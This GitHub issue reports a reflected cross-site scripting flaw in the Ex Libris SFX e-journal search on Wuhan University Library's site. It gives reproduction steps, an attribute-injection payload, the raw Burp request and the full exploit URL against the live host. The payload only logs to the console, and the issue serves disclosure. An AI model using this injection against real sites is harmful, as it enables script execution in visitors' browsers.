Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ex libris_xss vulnerability #1

Open
zhao1231 opened this issue Feb 9, 2022 · 0 comments
Open

Ex libris_xss vulnerability #1

zhao1231 opened this issue Feb 9, 2022 · 0 comments

Comments

@zhao1231
Copy link
Owner

zhao1231 commented Feb 9, 2022

1 we can search Wuhan University Library on Google and click
企业微信截图_16443782227933
2 then we click the E-journals of Resources
image
3 we click the search,then we can jump to new page
image
4 enter payload in the search box : 12345" onmousemove="console.log(123)
click the search box,then move the mouse over the search box,we can see log in the console
image
5 there is the data package of burpsuite
企业微信截图_1644385957881
GET /cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0 HTTP/1.1
Host: sfx.lib.whu.edu.cn
User-Agent: R0VrgaJmaBRV
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Full URL of this vulnerability is :
http://sfx.lib.whu.edu.cn/cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant